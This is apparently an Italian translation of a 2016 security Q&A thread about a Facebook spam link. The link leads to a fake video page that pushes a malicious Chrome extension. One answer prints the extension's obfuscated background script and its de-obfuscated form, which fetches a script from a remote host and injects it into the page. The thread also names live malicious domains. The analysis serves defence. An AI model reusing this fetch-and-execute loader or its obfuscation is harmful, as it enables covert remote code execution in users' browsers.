Che tipo di "virus" di Facebook condivide il link all'elenco dei numeri esadecimali?

1

Uno dei miei contatti di Facebook è riuscito a infettare il suo browser e / o a compromettere i suoi dettagli di accesso. Il risultato è che a intervalli regolari, presumibilmente guidati da qualche job CRON, il suo account pubblica link a una pagina sui profili degli altri.

Mi aspetterei un virus nella pagina, ma è semplicemente un documento HTML pieno di quello che sembra spazzatura.

<!DOCTYPE html>
<html>

  <head>
    <script type="text/javascript">
            var s e8e1f6a6c9f1e10 = "8a3fe80194";
            var s cc2b282b582ade9 = "7d92d7896e4";
            var s d594ccf3ab0112 = "44c8408f";
            var s 3bd9820d = "7d0b622f28";
            var s e66f0a78 = "f266438b79b";
            var s 6884d9 = "6e191fbdd";
            var s 5d217 = "95fb4c19fe";
            var s 20d4db5 = "a8d55";
            var s c610b0 = "5a62fad009";
            var s d080cdf38c11b56 = "8fba61927";
            var s b1d44d658a6878b = "fa4f4880";
            var s 80515b12c7c7 = "246b48dbae";
            var s 60331 = "d935db5e";
            var s 828d6f177edb = "9141eb4f0a998";
            var s 0f03c57762f594 = "f3e15a92596f";
            var s a51029e91 = "08f1fdaa4f";

    </script>
          <meta property="230a1b9" content="c2011df94c3bd" />
            <meta property="e4f49fa2ba4871e" content="f3ab66c" />
            <meta property="5edfdd7c012" content="03d34ebad190e6c" />
            <meta property="ee1aad1dfb45" content="3b4274f000a6251" />
            <meta property="faa54d3e79164" content="5d17b606b8deb" />
            <meta property="d8edd064d05" content="dc2d82e6e9380" />
            <meta property="7fae6238d5ad614" content="fb2b90b8d3743" />
            <meta property="370c635899882" content="a7489ab5519" />
            <meta property="8be30ad7e182" content="05acd34239b3599" />
            <meta property="f3dcae5" content="53e79f76" />
            <meta property="1c5585cc2" content="0efeeff5ff22" />
            <meta property="e2e47089" content="4bea8c444" />
              <title>
          17.908.529 views</title>
        <meta property="og:title" content="298947538" />
        <meta property="og:description" content="" />
  </head>

  <body>
    <h1>4200e002a7a458a9ac55cf9a</h1>
    <ul>
              <li>
          20438927b0f440696a697ed69        </li>
                <li>
          17ab800d6da89        </li>
                <li>
          83e18a3f99e714febab24        </li>
                <li>
          0902c76df58        </li>
                <li>
          ed84605356fe        </li>
                <li>
          d808b74516ed1ca27cd3        </li>
                <li>
          91bf81068985        </li>
                <li>
          91b0b712c95041690        </li>
                <li>
          7290c3ff31bae4b486b695e9d        </li>
                <li>
          b66acda355e35c        </li>
                <li>
          fcf316a3fef8        </li>
                <li>
          fa4bc9f5120723fc66        </li>
                <li>
          7ae04a845b42258a5        </li>
                <li>
          0a169abdbb        </li>
                <li>
          e2dd58513e4cba177513b4        </li>
                <li>
          34f675d984b130ef6e3cc60cb        </li>
                <li>
          615bf0d1a9        </li>
                  <ul>
            <div class="idadgrn hieesgo tiw">
              idadgrn hieesgo tiw            </div>
  </body>

</html>

Anche le intestazioni sono normali:

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 993
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Mon, 12 Sep 2016 21:50:25 GMT
Accept-Ranges: bytes
Server: LiteSpeed
access-control-allow-origin: *
Connection: close

Lo script nell'HTML non viene nemmeno eseguito poiché non è un codice javascript valido. Immagino senza preoccupare la vittima, non capirò come è riuscito a compromettere il suo account. Ma mi chiedo, qual è lo scopo di quei collegamenti?

Ecco uno di questi: http://cbf8kcux [DOT] fulldailyonlynews [DOT] com/COs10bR7 Non seguire l'URL ouside ambiente sicuro. Ho sostituito i punti con [DOT] per impedire l'incollatura senza scrupoli del collegamento.

Qual è lo scopo di questo? O è tutta una specie di falsa pista?

    
posta Tomáš Zato 12.09.2016 - 23:57
fonte

2 risposte

5

André Borie era sulla strada giusta. Questa sembra essere una cosa di comando e controllo di qualche descrizione.

Il mio GF ha un link pubblicato sulla sua pagina FB e perché aveva il suo nome in esso, ha cliccato su di esso. Questo la portò a un sito web con "codice casuale" come lei ha messo. Me ne ha parlato immediatamente e ho messo i miei occhiali da detective.

Il link in questione era 0udfczyk [dot] videossite [dot] ga / LKbdc84n

Quando ho provato a visitarlo in una VM in Chrome, mi ha reindirizzato a una pagina video di Facebook falsa (su fulldailyonlynews [dot] com ) con commenti falsi e tutto, e indipendentemente da dove hai fatto clic, ho provato ad aggiungere un'estensione per il browser chiamata " Zuve ", richiedendo l'accesso a" Leggi e modifica tutti i tuoi dati sui siti web che visiti ". Sì .. no grazie.

Link all'estensione: https://chrome.google.com/webstore/detail/zuve/ofambggiemkoplmbdloidhlbicfcfmak

Qualunque visita successiva al link videossite non mi ha reindirizzato al sito di Facebook fasullo (Fakebook?). Mi portano semplicemente al sito "codice casuale" come descritto dall'OP qui e dal mio GF. Questi codici (hash?) Cambiano ad ogni aggiornamento della pagina, e quando si puliscono tutte le cache e i cookie ecc. Si reindirizzerà nuovamente alla pagina Facebook falsa (una volta).

NON ho provato ad installare l'estensione del browser, ma considerando le prove è abbastanza ovvio che questa roba farà qualcosa di malevolo. Probabilmente proverai (ab) usando il tuo account Facebook (o altri account) per inviare spam a link più strani a questa roba.

Altri dettagli:

  • Link non sembra funzionare correttamente in Firefox o Opera (almeno nel mio caso no. Nessuna pagina di Facebook falsa, appare solo la "roba di codice")

Screenshots:

link

(dovevo collegarlo a un elenco di directory dato che non posso ancora pubblicare più di 2 collegamenti)

Spero che questo aiuti qualcuno ..

    
risposta data 13.09.2016 - 19:56
fonte
6

Ho scaricato questa estensione (link nel commento di Bambooz ) e ho provato a verificare cosa farà. Ecco background.js (lo script di background viene eseguito nel processo di estensione ):

var lsym = true;
var cmal = 24059;
var mwwe = {
    "mayeceroh": 53574,
    "avagagozave": 83706,
    "zunucog": 40507,
    "agifarig": 20915,
    "koyuci": 89453
};
var zsyt = 45095;
var pnpgnw = this;
var dkrjfv = lwawh("3pYSKX4uo37VHpmhnNFbg",1,true);
var tcqrsh = lwawh("ryY7J8Z3g74UyR2kVm.lIf",10,false);
var rjowvk = lwawh("rCBFMe=kaJkzI24kVJidHRe09_",14,false);
var rsohfd = lwawh("1X7ly4Dg",3,false);
var tanxle = lwawh("E.5gmeigdC",6,false);
pnpgnw[rsohfd](dkrjfv+tcqrsh+rjowvk)[tanxle](function(lcqbpv) {
  var yvtdn = lwawh("3wfEI2",4,true);
  if(lcqbpv[yvtdn]){
    var hqnom = lwawh("dEkiMpwwiHI2j",9,false);
    lcqbpv[hqnom]()[tanxle](function(qevtny){
      var elprl = lwawh("vqGEgmpp",5,true);
      var ulmsq = lwawh("oXBqr?m9Szs1oV29dV5Yysi/2F",11,false);
      var mpytne = pnpgnw[elprl][ulmsq](qevtny);
      var mmtry = lwawh("jtwHM2llnDGrypi",7,false);
      var vcatxl = lwawh("1ELg1KZMnDuHc4eJ_yEHN4",9,true);
      var mkebn = lwawh("gtYlUuDVoEY",5,false);
      var ghvrw = pnpgnw[mmtry][vcatxl](mkebn);
      var otpjhs = lwawh("RuIrJi6gRmk",8,true);
      ghvrw[otpjhs] = mpytne;
      var tllma = lwawh("1u9=ye:",3,false);
      var bjltd = lwawh("UuuUoNZoRkZ7KreeaBP_ef",11,true);
      pnpgnw[mmtry][tllma][bjltd](ghvrw);
    });
  }
});
function lwawh(fdnzl,xijua,xgeswl){
  var yfhfby = "uTDHJMXrk?mNoICxU_37Y:zsAnhO=SEBdfv52p9/Gab1gLlF.jt60Z4e8cViyRKP";
  var qtlobq = ["Vt\/f.4IFjAM?nDmv7p:0OPrRh=ElbkTzacSZxUsX569ugL_CK1GB8JedYiNo32yH","X5Rdn?im41Y96:BAM8PIoUtulCpVS\/vb3k7cgExfjhH2_FJON.GZTLsyeDa0zKr=","Gl1m:NguS0Ex7JRFpyCHz_ZB6OPno\/UKfsM2jh84Ai5?9bIa3LYTcXd.tkveDr=V","iJMP?pCVUBr32:OA54TvtcgFaK=ysR9nzlo\/L8.k67xZdXEjNYS0efuHG1I_bmhD","H2FkGTno1O9AIux5\/dXSZagM7Nt8.bsvJ?rVpKY0=cjRCfePD3UB6:Ey_i4mlhLz","NHC_67h825t.TzGEmIj9cXou=pg0n:1OfLKSxrlDAeRybviaPY4BM\/UVFs3k?ZJd","mOyK5gjaz0T7R?kAL9S\/cUZG3V1Xrfxs:P_.hbN4Y2lo=uFCE8itdJMeBDv6IpHn","YFb2a1RVUnrm=Bjs\/HTIc4DhxegyC5JilfZ7GkPuzoLO:p8S0X9.t6EK_MN?3dvA"];
  var oqdaom = "";
  var imzfs = 0;
  while(qtlobq[imzfs]){
    imzfs++;
  }
  var xnykx = 0;
  while(fdnzl[xnykx]){
    var liscvq = 0;
    var xpxrc = -1;
    while(yfhfby[liscvq]){
      if(yfhfby[liscvq] == fdnzl[xnykx]){
        xpxrc = liscvq;
        break;
      }
      liscvq++;
    }
    if(xpxrc >= 0){
      var rfgqzf = 0;
      var eqvzdw = -1;
      while(qtlobq[xnykx%imzfs][rfgqzf]){
        if(qtlobq[xnykx%imzfs][rfgqzf] == fdnzl[xnykx]){
          eqvzdw = rfgqzf;
          break;
        }
      rfgqzf++;
      }
      oqdaom += yfhfby[eqvzdw];
    }else{
      oqdaom += fdnzl[xnykx];
    }
    xnykx++;
  }
  var ttfrv = "";
  for(uevije=xijua;uevije<oqdaom.length;uevije++){
    ttfrv += oqdaom[uevije];
  }
  oqdaom = ttfrv;
  return oqdaom;
}
var pkqu = [
    "enedige",
    "ucosus",
    81739,
    "usurujo",
    98363,
    "ejojata",
    79813
];
var qybb = {
    "ecohididiy": 85533,
    "ajofahacer": "suvazi",
    "upasibug": 89625,
    "pugofutec": 26653,
    "lusatehiy": "getulir",
    "obesomo": "fihayopuz"
};

È stato codificato / offuscato. Quindi sono stato de-offuscato per ottenere il codice sorgente originale:

window.fetch('http://idorunuso.xyz/kebapurefod/pulagube.bg').then(function(response) {
  if (response.ok) {
    response.blob().then(function(blob) {
      var code = window.URL.createObjectURL(blob);
      var js = window.document.createElement('script');
      js.src = code;
      window.document.head.appendChild(js);
    });
  }
});

Come tutti vediamo, questo codice eseguirà un codice remoto. Sfortunatamente, quel link restituisce un codice di errore 404, quindi non posso continuare ad analizzare. Ma da quello che abbiamo visto, questo è quasi un codice dannoso.

A proposito, è come l'esempio di malware che ho analizzato in 2015 .

    
risposta data 14.09.2016 - 03:49
fonte

Leggi altre domande sui tag